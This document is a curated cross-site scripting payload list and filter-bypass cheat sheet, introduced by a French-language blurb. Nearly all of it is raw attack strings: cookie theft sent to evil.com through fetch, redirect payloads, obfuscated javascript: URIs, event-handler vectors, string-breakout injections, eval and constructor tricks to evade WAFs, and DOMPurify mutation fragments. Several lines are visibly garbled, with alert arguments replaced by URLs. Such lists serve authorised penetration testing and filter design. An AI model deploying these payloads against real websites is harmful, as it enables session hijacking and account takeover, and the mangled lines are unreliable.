
Collection organisée de payloads XSS et antisèche de contournement de filtres : évasion spécifique aux WAF, vecteurs d'injection JS/HTML, astuces d'encodage, contournements de DOMPurify et de Markdown.
document.location=
document['location']=
window.location=
this["window"]["location"]=
document.location.href=
location.href=
location=
window.location.assign()
window['location']['href']=
document.location.replace()
window.open("link", "_blank");
//google.com/?=a
//134744072:1234/?a= (decimal ip)
document.cookie
document['cookie']
with(document)alert(cookie)
doc\u0075ment.cookie
doc\u0075ment['cookie']
window["doc"+"ument"]["cookie"]
fetch("//evil.com/?c="+document.cookie)
fetch("//evil.com/?c=".concat(document.cookie))
fetch("//evil.com/?c=", document.cookie].join())
fetch(`//evil.com/?c=${document.cookie}`)
<!--javascript -->
javascript:alert(1)
JaVaScript:alert(1)
ja	vascript:alert(1)
java\tscript:alert(1)
ja
vascript:alert(1)
ja
vascript:alert(1)
javascript:alert()
javascript:alert('XSS')
# tab (0x9), newline (0xa) and carriage return (0xd) allowed (inside or after the protocol)
ja
vascript:alert(1) # New line
jav asc ript :alert(1) # Tab
# Special Characters before the protocol (Raw or encode)
# \x01-\x20 are allowed - Somes Example :
http://www.unicode-symbol.com/u/0017.html
http://www.unicode-symbol.com/u/0008.html
javascript:alert('Successful XSS') # ETB HTML
javascript:alert(1) # Backspace HTML
# colon
javascript:alert()
javascript:alert()
javascript:alert(1)
javascript:alert()
# javascript://
javascript://%0Aalert(1)
javascript://%0Dalert(1)
# target="_blank"
- Scroll Click
- Shift + Click
- Ctrl + Click
# alert
javascript:alert()
javascript:alert``
javascript:alert%60%60
javascript:x='%27-alert(1)-%27';
javascript:%61%6c%65%72%74%28%29
#JS unicode
javascript:a\u006Cert``"
javascript:\u0061\u006C\u0065\u0072\u0074``
https://gchq.github.io/CyberChef/#recipe=To_HTML_Entity(false,'Named%20entities')
' -> '
" -> "
` -> `
` -> `
( -> (
) -> )
{ -> {
} -> }
& -> &
< -> <
> -> >
\n -> 

\t -> 	
nbsp ->
\ -> \
[https://gchq.github.io/CyberChef/#recipe=To_HTML_Entity(false,'Hex%20entities')
' -> '
" -> "
` -> `
( -> (
{ -> {
} -> }
& -> &
< -> <
> -> >
\n -> 

\t -> 	
nbsp ->  
\ -> \
https://gchq.github.io/CyberChef/#recipe=To_HTML_Entity(false,'Numeric%20entities')
' -> '
" -> "
` -> `
( -> (
) -> )
{ -> {
} -> }
& -> &
< -> <
> -> >
\n ->
\t -> 	
nbsp ->  
\ -> \
( -> ( = (
( -> ( = (
test+(<script>alert(0)</script>)@example.com
test@example(<script>alert(0)</script>).com
"<script>alert(0)</script>"@example.com
#use href bypass
# if youtube is whitelisted for example
# base64 <script>alert(1)</script>
<svg/onload=alert(1)>
<object/data=javascript:prompt(1)>
<input/autofocus/onfocus=prompt(1)>
<audio/src/onloadstart=alert(1)>
<svg><animate/onbegin=alert(1)>
<svg><animate/dur='1s'onend=alert(1)>
<svg><set/onbegin=alert(1)>
<svg><set/dur='1ms'onend=alert(1)>
<marquee width=1 loop=1 onfinish=alert(1)>
<details/open/ontoggle=confirm(1)>
<details open ontoggle=confirm(1)>
<details/ontoggle='alert(1)'/open>
<details ontoggle=alert(1) open>
<script src=//0x8ac5c30a>
alert`45`
document.location="javascript:alert%2845%29"
onerror=alert;throw 45
https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md
<svg/onload='alert( 23 )'>
location=/javascript:alert%2823%29/.source;
https://jlajara.gitlab.io/XSS_20_characters
'-alert(1)-'
"-alert(1)-"
);alert(1)//
';alert(1)//
";alert(1)//
">//
'>//
>"@input="this.alert`1`
>'@input='this.alert`1`
" onerror='alert(1)'
" onerror='alert(1)'
<script>
var test = "injection <!-- <script/";
</script>
<script>alert(origin)</script>">
or
<input type="hidden" value="</script><script>alert(1)</script>">
or
<a href="</script><script>alert(3)</script>" value="xxx">TEST<a>
which can be in between quotes...
<script>
var test = "</script><svg/onload=alert(45)>"
</script>
<script>
var test = "</script ><svg/onload=alert(45)>"
</script>
<script>
var test = "</script ><svg/onload=alert(45)>"
</script>
<script>
var test = "</script random><svg/onload=alert(45)>"
</script>
<script>
var test = "</script
random><svg/onload=alert(45)>"
</script>
<script>
var test = "</script
random><svg/onload=alert(45)>"
</script>
<script>
var test = "</script <svg/onload=alert(45)>"
</script>
<script>
var test = ""+alert(45)+""
// user input: "+alert(45)+"
</script>
<script>
var test = "\", test1="+alert(45)//input2"
// Original: var test = "input1", test1="input2"
// user input1: \
// user input2: +alert(45)//
</script>
ws://google.com"><svg/onload=alert(2)>
wss://google.com"><svg/onload=alert(2)>
resource://google.com"><svg/onload=alert(2)>
https://www.gremwell.com/firefox-xss-302
https://www.hahwul.com/2020/10/03/forcing-http-redirect-xss/
["YWxlcnQoJ1hTUycp"].map(atob).map(eval)
console.trace()
console.error()
console.trace``
console.error``
confirm?.(1)
top.confirm?.(1)
alert?.(1)
(a=>a(1))(alert);
setTimeout(alert, 0, 1)
[1].forEach(alert);
alert.bind()(1)
a=alert;a`1`;
alert()
alert/**/()
alert (10)
alert\n(1)
var{a:onerror}={a:alert};throw%20document.cookie
alert(1)
window['alert'](https://github.com/edr4/xss-bypass-filters/blob/main/0)
parent['alert'](https://github.com/edr4/xss-bypass-filters/blob/main/1)
self['alert'](https://github.com/edr4/xss-bypass-filters/blob/main/2)
top['alert'](https://github.com/edr4/xss-bypass-filters/blob/main/3)
this['alert'](https://github.com/edr4/xss-bypass-filters/blob/main/4)
frames['alert'](https://github.com/edr4/xss-bypass-filters/blob/main/5)
content['alert'](https://github.com/edr4/xss-bypass-filters/blob/main/6)
[7].map(alert)
[8].find(alert)
[9].every(alert)
[10].filter(alert)
[11].findIndex(alert)
[12].forEach(alert);
eval('ale'+'rt(0)');
eval('ale'+'rt(0)');
Function("ale"+"rt(1)")();
new Function`al\ert\`6\``;
constructor.constructor("aler"+"t(3)")();
[].filter.constructor('ale'+'rt(4)')();
top["al"+"ert"](https://github.com/edr4/xss-bypass-filters/blob/main/5);
top[8680439..toString(30)](https://github.com/edr4/xss-bypass-filters/blob/main/7);
top[/al/.source+/ert/.source](https://github.com/edr4/xss-bypass-filters/blob/main/8);
top['al\x65rt'](https://github.com/edr4/xss-bypass-filters/blob/main/9);
open('java'+'script:ale'+'rt(11)');
setTimeout`alert\u0028document.domain\u0029`;
setTimeout('ale'+'rt(2)');
setInterval('ale'+'rt(10)');
Set.constructor('ale'+'rt(13)')();
Set.constructor`al\x65rt\x2814\x29```;
[666]["\155\141\160"]["\143\157\156\163\164\162\165\143\164\157\162"](https://github.com/edr4/xss-bypass-filters/blob/main/%22%5C141%5C154%5C145%5C162%5C164%28666)")(666)
<math><mtext><table><mglyph><style><!--</style>
<math><mtext><table><mglyph><style><![CDATA[</style>